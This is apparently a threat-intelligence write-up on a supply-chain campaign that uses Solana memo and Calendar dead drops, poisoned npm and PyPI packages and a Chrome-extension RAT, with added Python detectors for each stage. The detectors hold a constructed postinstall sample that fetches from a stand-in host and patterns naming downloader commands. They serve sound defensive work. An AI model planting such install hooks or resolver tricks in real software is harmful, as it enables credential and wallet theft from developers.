Infrastructure and Dead‑Drop Mechanism
The adversary uses Solana transaction memos as a dead-drop channel, embedding a C2 address that resolves to a remote server. Because the memo sits in an immutable public ledger, the resolver cannot be altered or taken down and sidesteps typical network monitoring, forcing defenders to inspect ledger entries for anomalies. The payload URL is concealed within the memo field, so inspection of network traffic alone is insufficient.
Operators also use a public Google Calendar event as a secondary resolver, pulling the RAT binary from a URL that appears benign. The calendar entry contains an encrypted string that, once decoded, points to the malicious host, which complicates detection by endpoint firewalls that trust calendar traffic. This dual-resolver design yields a resilient command path that survives partial takedown attempts.
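A defender-side check for the memo dead drop described above is to pull decoded memo strings from the ledger entries of interest and flag any that carry resolver-like content: a plain URL, an IP:port pair, or a base64 token that decodes to one. The following is an added example, not code from the original page or the campaign; the memo strings are constructed stand-ins for decoded Memo-program instruction data, and how you obtain real memos (RPC, an indexer, a ledger export) is outside the snippet.

```python
import base64
import binascii
import re

# Constructed stand-ins for decoded Memo-program instruction strings;
# none of these values come from a real ledger or from the campaign.
SAMPLE_MEMOS = [
    "thanks for the coffee",
    "order #4812 paid",
    "https://example.invalid/update.zip",
    "beacon 203.0.113.7:8443",
    base64.b64encode(b"https://example.invalid/stage1").decode(),
]

URL_RE = re.compile(r"(?i)\b(?:https?|wss?)://[^\s\"'<>]+")
IP_PORT_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{2,5})?\b")
# One unbroken base64 / base64url token of at least 16 characters.
B64_TOKEN_RE = re.compile(r"^[A-Za-z0-9+/=_-]{16,}$")


def try_base64(text):
    """Return the decoded text if `text` is a single base64 or base64url token
    that decodes to printable UTF-8, otherwise None."""
    token = text.strip()
    if not B64_TOKEN_RE.match(token):
        return None
    token = token.replace("-", "+").replace("_", "/")
    token += "=" * (-len(token) % 4)  # restore stripped padding
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def classify_memo(memo):
    """Return indicator tags for one memo; an empty list means nothing resolver-like."""
    tags = []
    if URL_RE.search(memo):
        tags.append("url")
    if IP_PORT_RE.search(memo):
        tags.append("ip")
    decoded = try_base64(memo)
    if decoded is not None:
        tags.append("base64")
        if URL_RE.search(decoded) or IP_PORT_RE.search(decoded):
            tags.append("encoded-url")
    return tags


def scan_memos(memos):
    """Return (memo, tags) for every memo that carries at least one indicator."""
    hits = []
    for memo in memos:
        tags = classify_memo(memo)
        if tags:
            hits.append((memo, tags))
    return hits


if __name__ == "__main__":
    for memo, tags in scan_memos(SAMPLE_MEMOS):
        print(f"{tags}: {memo}")
```

Run against the sample list, the three resolver-like memos are reported and the two ordinary payment notes are not. The base64 branch is the one that matters in practice: an operator has no reason to leave a URL in the clear, so the tagger decodes any single opaque token and re-applies the URL and IP tests to the result rather than trusting the surface text.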
Supply‑Chain Infection Vectors
The initial foothold is achieved by publishing malicious packages to npm, PyPI, and Open VSX, each masquerading as a legitimate library. The packages embed a post-install script that fetches the first-stage binary, ensuring execution on developer machines during dependency resolution. Compromised maintainer accounts let the operators push poisoned updates, extending reach to downstream projects.
To avoid detection in environments with a Russian locale, the installer checks the system language settings and aborts if a match is found, a simple yet effective evasion technique. This conditional logic reduces noise in those regions, aligning the campaign with geopolitical considerations without overtly revealing intent.
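Because the foothold depends on code that runs automatically at install time, a CI gate can refuse packages whose manifests declare such code before they reach a developer machine. The example below is added here and is not from the original page or any of the registries named; it audits an npm package.json for lifecycle install scripts and a PyPI setup.py for install-time execution patterns. The sample manifests are constructed, and the "suspicious command" patterns are a starting heuristic, not a complete list.

```python
import json
import re

# npm lifecycle scripts that run automatically during dependency installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Commands with no business in the install hook of an ordinary library.
SUSPICIOUS_CMD_RE = re.compile(
    r"(?i)\b(?:curl|wget|invoke-webrequest|iwr|powershell|node\s+-e|python\s+-c|base64|eval)\b"
    r"|https?://"
)

# setup.py patterns that indicate code running at install time beyond plain
# metadata: an overridden install command, process spawning, or network use.
SETUP_PY_PATTERNS = (
    (re.compile(r"cmdclass\s*="), "custom install command class"),
    (re.compile(r"\b(?:subprocess|os\.system|os\.popen)\b"), "process execution"),
    (re.compile(r"\b(?:urllib|requests|http\.client|socket)\b"), "network access"),
    (re.compile(r"\b(?:exec|eval)\s*\("), "dynamic code execution"),
)


def audit_package_json(text):
    """Return [(hook, command, suspicious)] for every install-time script declared."""
    manifest = json.loads(text)
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:
            findings.append((hook, cmd, bool(SUSPICIOUS_CMD_RE.search(cmd))))
    return findings


def audit_setup_py(text):
    """Return the label of every install-time behaviour pattern found in setup.py."""
    return [label for pattern, label in SETUP_PY_PATTERNS if pattern.search(text)]


def should_block(package_json_text=None, setup_py_text=None):
    """CI gate: block when an install hook runs a suspicious command or setup.py
    shows execution or network behaviour. Plain install hooks are reported but
    left to human review."""
    if package_json_text and any(s for _, _, s in audit_package_json(package_json_text)):
        return True
    if setup_py_text and audit_setup_py(setup_py_text):
        return True
    return False


# Constructed samples; not taken from any real package.
CLEAN_PACKAGE_JSON = '{"name": "clean-lib", "version": "1.0.0", "scripts": {"test": "jest", "build": "tsc"}}'
HOOKED_PACKAGE_JSON = (
    '{"name": "useful-lib", "version": "1.0.1", "scripts": {"test": "jest", '
    '"postinstall": "node -e \\"require(\'https\').get(\'https://example.invalid/s1\')\\""}}'
)
CLEAN_SETUP_PY = "from setuptools import setup\nsetup(name='clean', version='1.0')\n"
HOOKED_SETUP_PY = (
    "from setuptools import setup\nfrom setuptools.command.install import install\n"
    "import subprocess\nclass Post(install):\n    def run(self):\n"
    "        install.run(self)\n        subprocess.call(['echo', 'hooked'])\n"
    "setup(name='x', cmdclass={'install': Post})\n"
)

if __name__ == "__main__":
    print(audit_package_json(HOOKED_PACKAGE_JSON))
    print(audit_setup_py(HOOKED_SETUP_PY))
    print("block:", should_block(HOOKED_PACKAGE_JSON, HOOKED_SETUP_PY))
```

The gate runs on the unpacked tarball or wheel, not on the registry listing, since the published manifest is what actually executes. Treating any install hook as a finding (blocking only when the command looks like a downloader) keeps the rule useful for packages that legitimately compile native code at install time.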
Multi‑Stage Payload Architecture
Stage one delivers a lightweight downloader that contacts the Solana memo resolver, retrieves a compressed ZIP archive, and extracts a second-stage data-theft framework. The framework enumerates system details, harvests credential stores, and captures cryptocurrency wallet files, then recompresses the data for exfiltration. Exfiltration occurs over HTTPS to a hard-coded endpoint, blending with legitimate traffic patterns.
After exfiltration, the framework retrieves two additional components: a .NET binary designed for hardware wallet phishing and a JavaScript-based RAT that injects a malicious Chrome extension. The .NET component uses WMI queries to detect attached USB devices, enabling selective credential capture when a hardware wallet is present.
RAT Deployment via Chrome Extension
The JavaScript RAT masquerades as an offline Google Docs viewer and requests elevated browser permissions to log keystrokes, dump cookies, and capture session tokens. It also records screenshots and relays commands from the hidden C2, allowing attackers to execute arbitrary JavaScript in the victim's context. The extension's manifest is signed with a legitimate developer key, bypassing store verification.
Communication with the C2 uses WebSocket over port 443, encapsulating command traffic within standard TLS streams. This design defeats many network‑based intrusion detection signatures that rely on known RAT protocols, forcing defenders to rely on behavior‑based heuristics.
Detection and Response Recommendations
Security teams should implement provenance checks on package installations, verifying author signatures against known identities before accepting updates. Monitoring for anomalous Solana transaction lookups associated with internal IP addresses can reveal hidden dead-drop activity. Endpoint telemetry should flag processes that issue WMI queries enumerating USB devices without a legitimate business case.
Deploying browser integrity controls that restrict unsigned extensions, especially those requesting access to cookies or the clipboard, reduces the attack surface. Finally, integrating blockchain analytics into SOC workflows enables correlation of ledger events with internal alerts, giving early warning of emerging supply-chain threats.
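The WMI recommendation above can be turned into a concrete telemetry rule: alert when a process outside a documented allowlist issues a WMI query that both targets a device-enumeration class and filters for USB. The example below is added here and is not from the original page; it runs over constructed event lines written in a simplified key=value shape rather than the native Windows event format, and the image paths, PIDs and allowlist are invented for the example. Win32_USBControllerDevice, Win32_USBHub, Win32_PnPEntity and Win32_DiskDrive are real WMI classes; the allowlisted path is not a real product.

```python
import re

# Constructed telemetry lines (simplified key=value form, not the native
# Windows event schema); every path and PID here is made up for the example.
SAMPLE_EVENTS = r'''
2024-05-01T10:00:01Z pid=4120 image="C:\Windows\System32\svchost.exe" query="SELECT * FROM Win32_OperatingSystem"
2024-05-01T10:00:05Z pid=5532 image="C:\Program Files\Vendor\DeviceManager.exe" query="SELECT * FROM Win32_USBHub"
2024-05-01T10:00:09Z pid=7788 image="C:\Users\dev\AppData\Local\Temp\setup_helper.exe" query="SELECT DeviceID,PNPDeviceID FROM Win32_PnPEntity WHERE PNPDeviceID LIKE 'USB%'"
2024-05-01T10:00:10Z pid=7788 image="C:\Users\dev\AppData\Local\Temp\setup_helper.exe" query="SELECT * FROM Win32_USBControllerDevice"
2024-05-01T10:00:12Z pid=9001 image="C:\Windows\System32\wbem\WmiPrvSE.exe" query="SELECT Name FROM Win32_PnPEntity"
'''.strip().splitlines()

EVENT_RE = re.compile(
    r'^(?P<ts>\S+)\s+pid=(?P<pid>\d+)\s+image="(?P<image>[^"]*)"\s+query="(?P<query>[^"]*)"$'
)

# WMI classes used to enumerate attached devices; on their own they are common
# in benign inventory tooling, so the rule also requires a USB filter.
DEVICE_CLASS_RE = re.compile(
    r"(?i)\b(?:Win32_USBControllerDevice|Win32_USBHub|Win32_PnPEntity|Win32_DiskDrive)\b"
)
# Matches the USB-specific classes themselves and filters such as
# PNPDeviceID LIKE 'USB%' or InterfaceType='USB'.
USB_FILTER_RE = re.compile(r"(?i)usb")

# Images with a documented reason to enumerate USB devices (constructed allowlist,
# compared case-insensitively on the full path).
ALLOWED_IMAGES = {
    r"c:\program files\vendor\devicemanager.exe",
}


def parse_event(line):
    """Parse one telemetry line into a dict, or None if it does not match."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def is_usb_enumeration(query):
    """True when the query targets a device class and narrows it to USB."""
    return bool(DEVICE_CLASS_RE.search(query) and USB_FILTER_RE.search(query))


def detect_usb_enumeration(lines):
    """Return one alert per USB-enumerating WMI query from a non-allowlisted image."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or not is_usb_enumeration(ev["query"]):
            continue
        if ev["image"].lower() in ALLOWED_IMAGES:
            continue
        alerts.append({
            "ts": ev["ts"],
            "pid": int(ev["pid"]),
            "image": ev["image"],
            "query": ev["query"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_usb_enumeration(SAMPLE_EVENTS):
        print(alert)
```

Over the sample lines, only the two queries from the process running out of a user temp directory are reported: the vendor device manager is allowlisted, and the generic Win32_PnPEntity query without a USB filter is ignored. In production the allowlist should key on a code-signing identity rather than a path, since a path is trivial to spoof.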
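The extension described in the RAT section asks for cookies, clipboard and page access at once, and the browser-control recommendation above amounts to refusing that combination. The following is an added example, not code from the original page or from any browser vendor: it audits a Chrome extension manifest.json (MV2 or MV3) for high-risk permissions and broad host access and returns a block decision. The two manifests are constructed, and the block policy is an assumption chosen for the example.

```python
import json

# Chrome extension permissions that expose session material, other pages, or the host.
HIGH_RISK_PERMISSIONS = {
    "cookies", "clipboardRead", "clipboardWrite", "debugger", "nativeMessaging",
    "webRequest", "history", "management", "proxy", "desktopCapture", "tabCapture",
}
# Host patterns that grant access to every site.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_extension_manifest(text):
    """Summarise a manifest.json and decide whether policy should block the extension."""
    manifest = json.loads(text)
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    # Content scripts reach the same pages their match patterns name.
    for script in manifest.get("content_scripts", []):
        hosts |= set(script.get("matches", []))
    risky = sorted(perms & HIGH_RISK_PERMISSIONS)
    broad = sorted(hosts & BROAD_HOST_PATTERNS)
    # Policy (an assumption for this example): block when a high-risk permission is
    # paired with broad host access, or when debugger/nativeMessaging is requested at all.
    block = (bool(risky) and bool(broad)) or bool(perms & {"debugger", "nativeMessaging"})
    return {
        "name": manifest.get("name"),
        "manifest_version": manifest.get("manifest_version"),
        "risky_permissions": risky,
        "broad_hosts": broad,
        "block": block,
    }


# Constructed manifests; neither is a real extension.
VIEWER_MANIFEST = json.dumps({
    "name": "Docs Offline Viewer",
    "manifest_version": 3,
    "permissions": ["cookies", "tabs", "clipboardRead", "storage", "scripting"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["*://*/*"], "js": ["inject.js"]}],
})
NOTES_MANIFEST = json.dumps({
    "name": "Plain Notes",
    "manifest_version": 3,
    "permissions": ["storage"],
    "host_permissions": ["https://notes.example.invalid/*"],
})

if __name__ == "__main__":
    for text in (VIEWER_MANIFEST, NOTES_MANIFEST):
        print(audit_extension_manifest(text))
```

The audit is the inspection half of an allowlist policy: extensions that pass still need a signature or store-ID check before deployment, because a manifest can be rewritten after review. Feeding the decision into the browser's managed ExtensionInstallBlocklist/Allowlist policy is the usual enforcement point, but that wiring is environment-specific and left out here.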